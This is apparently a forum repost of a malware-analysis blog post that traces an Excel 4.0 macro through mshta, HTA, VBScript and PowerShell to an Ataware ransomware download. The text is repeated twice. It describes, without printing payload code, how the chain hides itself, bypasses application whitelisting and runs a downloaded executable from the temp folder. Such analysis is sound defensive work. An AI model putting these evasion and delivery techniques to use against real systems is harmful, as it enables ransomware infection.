- 7 Tem 2013
- 8,218
- 707
This will be a multiple part blog series analysing the complete infection chain from Excel to Ataware Ransomware. In this post we will discuss analysis steps for hta, VBScript & PowerShell code to extract the final payload url. Lets start with xls, I was browsing Twitter for an interesting sample, then I found this tweet from nao_sec and started investigating. You can download the xls from ANY.RUN.
Overview of analysis steps
xls analysis steps
Check the file type and extract the string
file and strings on xls
Go through the strings output and you will find the mshta cmd with Dropbox URL
mshta string
Output from string cmd
Now you know, this excel is definitely malicious by using only string tool
Lets analyse it further to understand how this mshta is invoked
Run olevba on xls, as you can see in the output below it uses Excel 4.0 macro hidden sheet to execute mshta cmd
Olevba tool
Detecting Excel 4.0 Macro
For more details on Excel 4.0 Macro, check the references section[1]. Now we will move on the hta file analysis.
htseelaaa.hta analysis
Content of hta file
Why are attacker using hta?
HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser [2]. hta file can be executed using inbuilt trusted Windows utility mshta which can bypass Application Whitelisting.
Deobfuscate Steps
Extract the vbs code from hta file and save as vbs
Replace the eval with Wscript.Echo and execute using script
Execute cscript
Replace Eval with Wscript.Echo and run using cscript
Now you can see the base64 encoded PowerShell code, instead of manual deobfuscation lets run the PowerShell code inside our VM with FakeNet-NG
Execute PowerShell
Execute PowerShell code extracted from VBScript
Enable PowerShell Enhanced Logging before running above PowerShell code, for more details check this Deobfuscate PowerShell using PowerShell Logging
After executing, go through PowerShell logs in EventViewer to find out the debofuscate code as shown below
Decoded PowerShell
Decoded PowerShell in PowerShell Logs
Copy the PowerShell code after removing iex and execute it to see the final decoded code shown below
Final Decoded PS
This PowerShell download the PE file from the dropbox link and executes it in the $temp directory with filename ATAPIinit.exe.
Conclusion
Infection vector is unique as it is using Excel 4.0 Macro technique with mshta and PowerShell.
Heavily obfuscated to slow down analysis
Using dropbox as initial payload delivery, as dropbox may be allowed in proxy
Hope you enjoyed this post.
Turkish version: https://www.turkhackteam.org/adli-b...aware-ransomware-1-kisim-0x1.html#post9235007
Source: https://www.securityinbits.com/malw...owershell-analysis-ataware-ransomware-part-1/
Translator Gauloran
Overview of analysis steps
xls analysis steps
Check the file type and extract the string
Kod:
strings "563902-IT Services Procurement Catalog updated.xls" > str_excel.txt
file and strings on xls
Go through the strings output and you will find the mshta cmd with Dropbox URL
mshta string
Output from string cmd
Now you know, this excel is definitely malicious by using only string tool
Lets analyse it further to understand how this mshta is invoked
Run olevba on xls, as you can see in the output below it uses Excel 4.0 macro hidden sheet to execute mshta cmd
Olevba tool
Detecting Excel 4.0 Macro
For more details on Excel 4.0 Macro, check the references section[1]. Now we will move on the hta file analysis.
htseelaaa.hta analysis
Content of hta file
Why are attacker using hta?
HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser [2]. hta file can be executed using inbuilt trusted Windows utility mshta which can bypass Application Whitelisting.
Deobfuscate Steps
Extract the vbs code from hta file and save as vbs
Replace the eval with Wscript.Echo and execute using script
Execute cscript
Replace Eval with Wscript.Echo and run using cscript
Now you can see the base64 encoded PowerShell code, instead of manual deobfuscation lets run the PowerShell code inside our VM with FakeNet-NG
Execute PowerShell
Execute PowerShell code extracted from VBScript
Enable PowerShell Enhanced Logging before running above PowerShell code, for more details check this Deobfuscate PowerShell using PowerShell Logging
After executing, go through PowerShell logs in EventViewer to find out the debofuscate code as shown below
Decoded PowerShell
Decoded PowerShell in PowerShell Logs
Copy the PowerShell code after removing iex and execute it to see the final decoded code shown below
Final Decoded PS
This PowerShell download the PE file from the dropbox link and executes it in the $temp directory with filename ATAPIinit.exe.
Conclusion
Infection vector is unique as it is using Excel 4.0 Macro technique with mshta and PowerShell.
Heavily obfuscated to slow down analysis
Using dropbox as initial payload delivery, as dropbox may be allowed in proxy
Hope you enjoyed this post.
Turkish version: https://www.turkhackteam.org/adli-b...aware-ransomware-1-kisim-0x1.html#post9235007
Source: https://www.securityinbits.com/malw...owershell-analysis-ataware-ransomware-part-1/
Translator Gauloran